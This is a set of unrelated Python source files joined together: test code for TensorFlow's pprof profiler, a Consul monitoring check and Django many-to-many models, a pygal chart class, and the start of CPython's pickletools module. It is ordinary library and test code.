op1.traceback = [('a/b/file1', 10, 'some_var')]
op1.type = 'add'
graph.get_operations.return_value = [op1]
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(0, len(profiles))
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(0, len(profile_files))
def testValidProfile(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
node1 = step_stats_pb2.NodeExecStats(
node_name='Add/123',
op_start_rel_micros=3,
op_end_rel_micros=5,
all_end_rel_micros=4)
run_metadata = config_pb2.RunMetadata()
device1 = run_metadata.step_stats.dev_stats.add()
device1.device = 'deviceA'
device1.node_stats.extend([node1])
graph = test.mock.MagicMock()
op1 = test.mock.MagicMock()
op1.name = 'Add/123'
op1.traceback = [
('a/b/file1', 10, 'apply_op', 'abc'), ('a/c/file2', 12, 'my_op', 'def')]
op1.type = 'add'
graph.get_operations.return_value = [op1]
expected_proto = """sample_type {
type: 5
unit: 5
}
sample_type {
type: 6
unit: 7
}
sample_type {
type: 8
unit: 7
}
sample {
value: 1
value: 4
value: 2
label {
key: 1
str: 2
}
label {
key: 3
str: 4
}
}
string_table: ""
string_table: "node_name"
string_table: "Add/123"
string_table: "op_type"
string_table: "add"
string_table: "count"
string_table: "all_time"
string_table: "nanoseconds"
string_table: "op_time"
string_table: "Device 1 of 1: deviceA"
comment: 9
"""
# Test with protos
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(1, len(profiles))
self.assertTrue('deviceA' in profiles)
self.assertEqual(expected_proto, str(profiles['deviceA']))
# Test with files
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(1, len(profile_files))
with gzip.open(profile_files[0]) as profile_file:
profile_contents = profile_file.read()
profile = profile_pb2.Profile()
profile.ParseFromString(profile_contents)
self.assertEqual(expected_proto, str(profile))
@test_util.run_v1_only('b/120545219')
def testProfileWithWhileLoop(self):
options = config_pb2.RunOptions()
options.trace_level = config_pb2.RunOptions.FULL_TRACE
run_metadata = config_pb2.RunMetadata()
num_iters = 5
with self.cached_session() as sess:
i = constant_op.constant(0)
c = lambda i: math_ops.less(i, num_iters)
b = lambda i: math_ops.add(i, 1)
r = control_flow_ops.while_loop(c, b, [i])
sess.run(r, options=options, run_metadata=run_metadata)
profiles = pprof_profiler.get_profiles(sess.graph, run_metadata)
self.assertEqual(1, len(profiles))
profile = next(iter(profiles.values()))
add_samples = [] # Samples for the while/Add node
for sample in profile.sample:
if profile.string_table[sample.label[0].str] == 'while/Add':
add_samples.append(sample)
# Values for same nodes are aggregated.
self.assertEqual(1, len(add_samples))
# Value of "count" should be equal to number of iterations.
self.assertEqual(num_iters, add_samples[0].value[0])
if __name__ == '__main__':
test.main()
|
"""
Horizontal graph base
"""
from pygal.graph.graph import Graph
from pygal.view import HorizontalView, HorizontalLogView
class HorizontalGraph(Graph):
"""Horizontal graph"""
def __init__(self, *args, **kwargs):
self.horizontal = True
super(HorizontalGraph, self).__init__(*args, **kwargs)
def _post_compute(self):
self._x_labels, self._y_labels = self._y_labels, self._x_labels
self._x_2nd_labels, self._y_2nd_labels = (
self._y_2nd_labels, self._x_2nd_labels)
def _axes(self):
self.view._force_vertical = True
super(HorizontalGraph, self)._axes()
self.view._force_vertical = False
def _set_view(self):
"""Assign a view to current graph"""
if self.logarithmic:
view_class = HorizontalLogView
else:
view_class = HorizontalView
self.view = view_class(
self.width - self.margin.x,
self.height - self.margin.y,
self._box)
|
import random
from tests.checks.common import AgentCheckTest, load_check
from utils.containers import hash_mutable
MOCK_CONFIG = {
'init_config': {},
'instances' : [{
'url': 'http://localhost:8500',
'catalog_checks': True,
}]
}
MOCK_CONFIG_SERVICE_WHITELIST = {
'init_config': {},
'instances' : [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'service_whitelist': ['service_{0}'.format(k) for k in range(70)]
}]
}
MOCK_CONFIG_LEADER_CHECK = {
'init_config': {},
'instances' : [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'new_leader_checks': True
}]
}
MOCK_CONFIG_SELF_LEADER_CHECK = {
'init_config': {},
'instances' : [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'self_leader_check': True
}]
}
MOCK_CONFIG_NETWORK_LATENCY_CHECKS = {
'init_config': {},
'instances' : [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'network_latency_checks': True
}]
}
MOCK_BAD_CONFIG = {
'init_config': {},
'instances' : [{ # Multiple instances should cause it to fail
'url': 'http://localhost:8500',
'catalog_checks': True,
'new_leader_checks': True
}, {
'url': 'http://localhost:8501',
'catalog_checks': True,
'new_leader_checks': True,
'self_leader_check': True
}]
}
def _get_random_ip():
rand_int = int(15 * random.random()) + 10
return "10.0.2.{0}".format(rand_int)
class TestCheckConsul(AgentCheckTest):
CHECK_NAME = 'consul'
def mock_get_peers_in_cluster(self, instance):
return [
"10.0.2.14:8300",
"10.0.2.15:8300",
"10.0.2.16:8300"
]
def mock_get_services_in_cluster(self, instance):
return {
"service-1": [
"az-us-east-1a"
],
"service-2": [
"az-us-east-1a"
],
"service-3": [
"az-us-east-1a"
],
"service-4": [
"az-us-east-1a"
],
"service-5": [
"az-us-east-1a"
],
"service-6": [
"az-us-east-1a"
]
}
def mock_get_n_services_in_cluster(self, n):
dct = {}
for i in range(n):
k = "service_{0}".format(i)
dct[k] = []
return dct
def mock_get_local_config(self, instance, instance_state):
return {
"Config": {
"AdvertiseAddr": "10.0.2.15",
"Datacenter": "dc1",
"Ports": {
"DNS": 8600,
"HTTP": 8500,
"HTTPS": -1,
"RPC": 8400,
"SerfLan": 8301,
"SerfWan": 8302,
"Server": 8300
},
}
}
def mock_get_nodes_in_cluster(self, instance):
return [
{
"Address": "10.0.2.15",
"Node": "node-1"
},
{
"Address": "10.0.2.25",
"Node": "node-2"
},
{
"Address": "10.0.2.35",
"Node": "node-2"
},
]
def mock_get_nodes_with_service(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "passing"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_nodes_with_service_warning(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "warning"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_nodes_with_service_critical(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "warning"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "critical"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_coord_datacenters(self, instance):
return [{
"Datacenter": "dc1",
"Coordinates": [
{
"Node": "host-1",
"Coord": {
"Vec": [
0.036520147625677804,
-0.00453289164613373,
-0.020523210880196232,
-0.02699760529719879,
-0.02689207977655939,
-0.01993826834797845,
-0.013022029942846501,
-0.002101656069659926
],
"Error": 0.11137306578107628,
"Adjustment": -0.00021065907491393056,
"Height": 1.1109163532378512e-05
}
}]
}, {
"Datacenter": "dc2",
"Coordinates": [
{
"Node": "host-2",
"Coord": {
"Vec": [
0.03548568620505946,
-0.0038202417296129025,
-0.01987440114252717,
-0.026223108843980016,
-0.026581965209197853,
-0.01891384862245717,
-0.013677323575279184,
-0.0014257906933581217
],
"Error": 0.06388569381495224,
"Adjustment": -0.00036731776343708724,
"Height": 8.962823816793629e-05
}
}]
}]
def mock_get_coord_nodes(self, instance):
return [{
"Node": "host-1",
"Coord": {
"Vec": [
0.007682993877165208,
0.002411059340215172,
0.0016420746641640123,
0.0037411046929292906,
0.004541946058965728,
0.0032195622863890523,
-0.0039447666794166095,
-0.0021767019427297815
],
"Error": 0.28019529748212335,
"Adjustment": -9.966407036439966e-05,
"Height": 0.00011777098790169723
}
}, {
"Node": "host-2",
"Coord": {
"Vec": [
0.007725239390196322,
0.0025160987581685982,
0.0017412811939227935,
0.003740935739394932,
0.004628794642643524,
0.003190871896051593,
-0.004058197296573195,
-0.002108437352702053
],
"Error": 0.31518043241386984,
"Adjustment": -0.00012274366490350246,
"Height": 0.00015006836008626717
}
}]
def mock_get_cluster_leader_A(self, instance):
return '10.0.2.15:8300'
def mock_get_cluster_leader_B(self, instance):
return 'My New Leader'
def _get_consul_mocks(self):
return {
'get_services_in_cluster': self.mock_get_services_in_cluster,
'get_nodes_with_service': self.mock_get_nodes_with_service,
'get_peers_in_cluster': self.mock_get_peers_in_cluster,
'_get_local_config': self.mock_get_local_config,
'_get_cluster_leader': self.mock_get_cluster_leader_A,
'_get_coord_datacenters': self.mock_get_coord_datacenters,
'_get_coord_nodes': self.mock_get_coord_nodes,
}
def test_get_nodes_with_service(self):
self.run_check(MOCK_CONFIG, mocks=self._get_consul_mocks())
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_passing', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_nodes_with_service_warning(self):
my_mocks = self._get_consul_mocks()
my_mocks['get_nodes_with_service'] = self.mock_get_nodes_with_service_warning
self.run_check(MOCK_CONFIG, mocks=my_mocks)
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_passing', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_nodes_with_service_critical(self):
my_mocks = self._get_consul_mocks()
my_mocks['get_nodes_with_service'] = self.mock_get_nodes_with_service_critical
self.run_check(MOCK_CONFIG, mocks=my_mocks)
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_passing', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_peers_in_cluster(self):
mocks = self._get_consul_mocks()
# When node is leader
self.run_check(MOCK_CONFIG, mocks=mocks)
self.assertMetric('consul.peers', value=3, tags=['consul_datacenter:dc1', 'mode:leader'])
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
# When node is follower
self.run_check(MOCK_CONFIG, mocks=mocks)
self.assertMetric('consul.peers', value=3, tags=['consul_datacenter:dc1', 'mode:follower'])
def test_cull_services_list(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
# Pad num_services to kick in truncation logic
num_services = self.check.MAX_SERVICES + 20
# Big whitelist
services = self.mock_get_n_services_in_cluster(num_services)
whitelist = ['service_{0}'.format(k) for k in range(num_services)]
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), self.check.MAX_SERVICES)
# Whitelist < MAX_SERVICES should spit out the whitelist
services = self.mock_get_n_services_in_cluster(num_services)
whitelist = ['service_{0}'.format(k) for k in range(self.check.MAX_SERVICES-1)]
self.assertEqual(set(self.check._cull_services_list(services, whitelist)), set(whitelist))
# No whitelist, still triggers truncation
whitelist = []
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), self.check.MAX_SERVICES)
# Num. services < MAX_SERVICES should be no-op in absence of whitelist
num_services = self.check.MAX_SERVICES - 1
services = self.mock_get_n_services_in_cluster(num_services)
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), num_services)
# Num. services < MAX_SERVICES should spit out only the whitelist when one is defined
num_services = self.check.MAX_SERVICES - 1
whitelist = ['service_1', 'service_2', 'service_3']
services = self.mock_get_n_services_in_cluster(num_services)
self.assertEqual(set(self.check._cull_services_list(services, whitelist)), set(whitelist))
def test_new_leader_event(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
instance_hash = hash_mutable(MOCK_CONFIG_LEADER_CHECK['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = 'My Old Leader'
mocks = self._get_consul_mocks()
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
self.run_check(MOCK_CONFIG_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:My Old Leader', event['tags'])
self.assertIn('curr_consul_leader:My New Leader', event['tags'])
def test_self_leader_event(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_SELF_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
instance_hash = hash_mutable(MOCK_CONFIG_SELF_LEADER_CHECK['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = 'My Old Leader'
mocks = self._get_consul_mocks()
our_url = self.mock_get_cluster_leader_A(None)
other_url = self.mock_get_cluster_leader_B(None)
# We become the leader
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_A
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
self.assertEqual(our_url, self.check._instance_states[instance_hash].last_known_leader)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:My Old Leader', event['tags'])
self.assertIn('curr_consul_leader:%s' % our_url, event['tags'])
# We are already the leader, no new events
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 0)
# We lose the leader, no new events
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 0)
self.assertEqual(other_url, self.check._instance_states[instance_hash].last_known_leader)
# We regain the leadership
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_A
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
self.assertEqual(our_url, self.check._instance_states[instance_hash].last_known_leader)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:%s' % other_url, event['tags'])
self.assertIn('curr_consul_leader:%s' % our_url, event['tags'])
def test_network_latency_checks(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_NETWORK_LATENCY_CHECKS,
self.DEFAULT_AGENT_CONFIG)
mocks = self._get_consul_mocks()
# We start out as the leader, and stay that way
instance_hash = hash_mutable(MOCK_CONFIG_NETWORK_LATENCY_CHECKS['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = self.mock_get_cluster_leader_A(None)
self.run_check(MOCK_CONFIG_NETWORK_LATENCY_CHECKS, mocks=mocks)
latency = [m for m in self.metrics if m[0].startswith('consul.net.')]
latency.sort()
# Make sure we have the expected number of metrics
self.assertEquals(19, len(latency))
# Only 3 dc-latency metrics since we only do source = self
dc = [m for m in latency if '.dc.latency.' in m[0]]
self.assertEquals(3, len(dc))
self.assertEquals(1.6746410750238774, dc[0][2])
# 16 latency metrics, 2 nodes * 8 metrics each
node = [m for m in latency if '.node.latency.' in m[0]]
self.assertEquals(16, len(node))
self.assertEquals(0.26577747932995816, node[0][2])
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.core import management
from django.test import TestCase
from django.utils.six import StringIO
from .models import (
Car, CarDriver, Driver, Group, Membership, Person, UserMembership,
)
class M2MThroughTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.bob = Person.objects.create(name="Bob")
cls.jim = Person.objects.create(name="Jim")
cls.rock = Group.objects.create(name="Rock")
cls.roll = Group.objects.create(name="Roll")
cls.frank = User.objects.create_user("frank", "frank@example.com", "password")
cls.jane = User.objects.create_user("jane", "jane@example.com", "password")
# normal intermediate model
cls.bob_rock = Membership.objects.create(person=cls.bob, group=cls.rock)
cls.bob_roll = Membership.objects.create(person=cls.bob, group=cls.roll, price=50)
cls.jim_rock = Membership.objects.create(person=cls.jim, group=cls.rock, price=50)
# intermediate model with custom id column
cls.frank_rock = UserMembership.objects.create(user=cls.frank, group=cls.rock)
cls.frank_roll = UserMembership.objects.create(user=cls.frank, group=cls.roll)
cls.jane_rock = UserMembership.objects.create(user=cls.jane, group=cls.rock)
def test_retrieve_reverse_m2m_items(self):
self.assertQuerysetEqual(
self.bob.group_set.all(), [
"<Group: Rock>",
"<Group: Roll>",
],
ordered=False
)
def test_retrieve_forward_m2m_items(self):
self.assertQuerysetEqual(
self.roll.members.all(), [
"<Person: Bob>",
]
)
def test_cannot_use_setattr_on_reverse_m2m_with_intermediary_model(self):
msg = (
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use m2m_through_regress.Membership's Manager "
"instead."
)
with self.assertRaisesMessage(AttributeError, msg):
self.bob.group_set.set([])
def test_cannot_use_setattr_on_forward_m2m_with_intermediary_model(self):
msg = (
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use m2m_through_regress.Membership's Manager "
"instead."
)
with self.assertRaisesMessage(AttributeError, msg):
self.roll.members.set([])
def test_cannot_use_create_on_m2m_with_intermediary_model(self):
with self.assertRaises(AttributeError):
self.rock.members.create(name="Anne")
def test_cannot_use_create_on_reverse_m2m_with_intermediary_model(self):
with self.assertRaises(AttributeError):
self.bob.group_set.create(name="Funk")
def test_retrieve_reverse_m2m_items_via_custom_id_intermediary(self):
self.assertQuerysetEqual(
self.frank.group_set.all(), [
"<Group: Rock>",
"<Group: Roll>",
],
ordered=False
)
def test_retrieve_forward_m2m_items_via_custom_id_intermediary(self):
self.assertQuerysetEqual(
self.roll.user_members.all(), [
"<User: frank>",
]
)
def test_join_trimming_forwards(self):
"""
Too many copies of the intermediate table aren't involved when doing a
join (#8046, #8254).
"""
self.assertQuerysetEqual(
self.rock.members.filter(membership__price=50), [
"<Person: Jim>",
]
)
def test_join_trimming_reverse(self):
self.assertQuerysetEqual(
self.bob.group_set.filter(membership__price=50), [
"<Group: Roll>",
]
)
class M2MThroughSerializationTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.bob = Person.objects.create(name="Bob")
cls.roll = Group.objects.create(name="Roll")
cls.bob_roll = Membership.objects.create(person=cls.bob, group=cls.roll)
def test_serialization(self):
"m2m-through models aren't serialized as m2m fields. Refs #8134"
pks = {"p_pk": self.bob.pk, "g_pk": self.roll.pk, "m_pk": self.bob_roll.pk}
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="json", stdout=out)
self.assertJSONEqual(
out.getvalue().strip(),
'[{"pk": %(m_pk)s, "model": "m2m_through_regress.membership", "fields": {"person": %(p_pk)s, "price": '
'100, "group": %(g_pk)s}}, {"pk": %(p_pk)s, "model": "m2m_through_regress.person", "fields": {"name": '
'"Bob"}}, {"pk": %(g_pk)s, "model": "m2m_through_regress.group", "fields": {"name": "Roll"}}]'
% pks
)
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="xml", indent=2, stdout=out)
self.assertXMLEqual(out.getvalue().strip(), """
<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object pk="%(m_pk)s" model="m2m_through_regress.membership">
<field to="m2m_through_regress.person" name="person" rel="ManyToOneRel">%(p_pk)s</field>
<field to="m2m_through_regress.group" name="group" rel="ManyToOneRel">%(g_pk)s</field>
<field type="IntegerField" name="price">100</field>
</object>
<object pk="%(p_pk)s" model="m2m_through_regress.person">
<field type="CharField" name="name">Bob</field>
</object>
<object pk="%(g_pk)s" model="m2m_through_regress.group">
<field type="CharField" name="name">Roll</field>
</object>
</django-objects>
""".strip() % pks)
class ToFieldThroughTests(TestCase):
def setUp(self):
self.car = Car.objects.create(make="Toyota")
self.driver = Driver.objects.create(name="Ryan Briscoe")
CarDriver.objects.create(car=self.car, driver=self.driver)
# We are testing if wrong objects get deleted due to using wrong
# field value in m2m queries. So, it is essential that the pk
# numberings do not match.
# Create one intentionally unused driver to mix up the autonumbering
self.unused_driver = Driver.objects.create(name="Barney Gumble")
# And two intentionally unused cars.
self.unused_car1 = Car.objects.create(make="Trabant")
self.unused_car2 = Car.objects.create(make="Wartburg")
def test_to_field(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
def test_to_field_reverse(self):
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
def test_to_field_clear_reverse(self):
self.driver.car_set.clear()
self.assertQuerysetEqual(
self.driver.car_set.all(), [])
def test_to_field_clear(self):
self.car.drivers.clear()
self.assertQuerysetEqual(
self.car.drivers.all(), [])
# Low level tests for _add_items and _remove_items. We test these methods
# because .add/.remove aren't available for m2m fields with through, but
# through is the only way to set to_field currently. We do want to make
# sure these methods are ready if the ability to use .add or .remove with
# to_field relations is added some day.
def test_add(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
# Yikes - barney is going to drive...
self.car.drivers._add_items('car', 'driver', self.unused_driver)
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Barney Gumble>", "<Driver: Ryan Briscoe>"]
)
def test_add_null(self):
nullcar = Car.objects.create(make=None)
with self.assertRaises(ValueError):
nullcar.drivers._add_items('car', 'driver', self.unused_driver)
def test_add_related_null(self):
nulldriver = Driver.objects.create(name=None)
with self.assertRaises(ValueError):
self.car.drivers._add_items('car', 'driver', nulldriver)
def test_add_reverse(self):
car2 = Car.objects.create(make="Honda")
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
self.driver.car_set._add_items('driver', 'car', car2)
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>", "<Car: Honda>"],
ordered=False
)
def test_add_null_reverse(self):
nullcar = Car.objects.create(make=None)
with self.assertRaises(ValueError):
self.driver.car_set._add_items('driver', 'car', nullcar)
def test_add_null_reverse_related(self):
nulldriver = Driver.objects.create(name=None)
with self.assertRaises(ValueError):
nulldriver.car_set._add_items('driver', 'car', self.car)
def test_remove(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
self.car.drivers._remove_items('car', 'driver', self.driver)
self.assertQuerysetEqual(
self.car.drivers.all(), [])
def test_remove_reverse(self):
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
self.driver.car_set._remove_items('driver', 'car', self.car)
self.assertQuerysetEqual(
self.driver.car_set.all(), [])
class ThroughLoadDataTestCase(TestCase):
fixtures = ["m2m_through"]
def test_sequence_creation(self):
"""
Sequences on an m2m_through are created for the through model, not a
phantom auto-generated m2m table (#11107).
"""
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="json", stdout=out)
self.assertJSONEqual(
out.getvalue().strip(),
'[{"pk": 1, "model": "m2m_through_regress.usermembership", "fields": {"price": 100, "group": 1, "user"'
': 1}}, {"pk": 1, "model": "m2m_through_regress.person", "fields": {"name": "Guido"}}, {"pk": 1, '
'"model": "m2m_through_regress.group", "fields": {"name": "Python Core Group"}}]'
)
|
'''"Executable documentation" for the pickle module.
Extensive comments about the pickle protocols and pickle-machine opcodes
can be found here. Some functions meant for external use:
genops(pickle)
Generate all the opcodes in a pickle, as (opcode, arg, position) triples.
dis(pickle, out=None, memo=None, indentlevel=4)
Print a symbolic disassembly of a pickle.
'''
import codecs
import io
import pickle
import re
import sys
__all__ = ['dis', 'genops', 'optimize']
bytes_types = pickle.bytes_types
UP_TO_NEWLINE = -1
TAKEN_FROM_ARGUMENT1 = -2 # num bytes is 1-byte unsigned int
TAKEN_FROM_ARGUMENT4 = -3 # num bytes is 4-byte signed little-endian int
TAKEN_FROM_ARGUMENT4U = -4 # num bytes is 4-byte unsigned little-endian int
TAKEN_FROM_ARGUMENT8U = -5 # num bytes is 8-byte unsigned little-endian int
class ArgumentDescriptor(object):
__slots__ = (
# name of descriptor record, also a module global name; a string
'name',
# length of argument, in bytes; an int; UP_TO_NEWLINE and
# TAKEN_FROM_ARGUMENT{1,4,8} are negative values for variable-length
# cases
'n',
# a function taking a file-like object, reading this kind of argument
# from the object at the current position, advancing the current
# position by n bytes, and returning the value of the argument
'reader',
# human-readable docs for this arg descriptor; a string
'doc',
)
def __init__(self, name, n, reader, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(n, int) and (n >= 0 or
n in (UP_TO_NEWLINE,
TAKEN_FROM_ARGUMENT1,
TAKEN_FROM_ARGUMENT4,
TAKEN_FROM_ARGUMENT4U,
TAKEN_FROM_ARGUMENT8U))
self.n = n
self.reader = reader
assert isinstance(doc, str)
self.doc = doc
from struct import unpack as _unpack
def read_uint1(f):
r"""
>>> import io
>>> read_uint1(io.BytesIO(b'\xff'))
255
"""
data = f.read(1)
if data:
return data[0]
raise ValueError("not enough data in stream to read uint1")
uint1 = ArgumentDescriptor(
name='uint1',
n=1,
reader=read_uint1,
doc="One-byte unsigned integer.")
def read_uint2(f):
r"""
>>> import io
>>> read_uint2(io.BytesIO(b'\xff\x00'))
255
>>> read_uint2(io.BytesIO(b'\xff\xff'))
65535
"""
data = f.read(2)
if len(data) == 2:
return _unpack("<H", data)[0]
raise ValueError("not enough data in stream to read uint2")
uint2 = ArgumentDescriptor(
name='uint2',
n=2,
reader=read_uint2,
doc="Two-byte unsigned integer, little-endian.")
def read_int4(f):
r"""
>>> import io
>>> read_int4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_int4(io.BytesIO(b'\x00\x00\x00\x80')) == -(2**31)
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<i", data)[0]
raise ValueError("not enough data in stream to read int4")
int4 = ArgumentDescriptor(
name='int4',
n=4,
reader=read_int4,
doc="Four-byte signed integer, little-endian, 2's complement.")
def read_uint4(f):
r"""
>>> import io
>>> read_uint4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_uint4(io.BytesIO(b'\x00\x00\x00\x80')) == 2**31
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<I", data)[0]
raise ValueError("not enough data in stream to read uint4")
uint4 = ArgumentDescriptor(
name='uint4',
n=4,
reader=read_uint4,
doc="Four-byte unsigned integer, little-endian.")
def read_uint8(f):
r"""
>>> import io
>>> read_uint8(io.BytesIO(b'\xff\x00\x00\x00\x00\x00\x00\x00'))
255
>>> read_uint8(io.BytesIO(b'\xff' * 8)) == 2**64-1
True
"""
data = f.read(8)
if len(data) == 8:
return _unpack("<Q", data)[0]
raise ValueError("not enough data in stream to read uint8")
uint8 = ArgumentDescriptor(
name='uint8',
n=8,
reader=read_uint8,
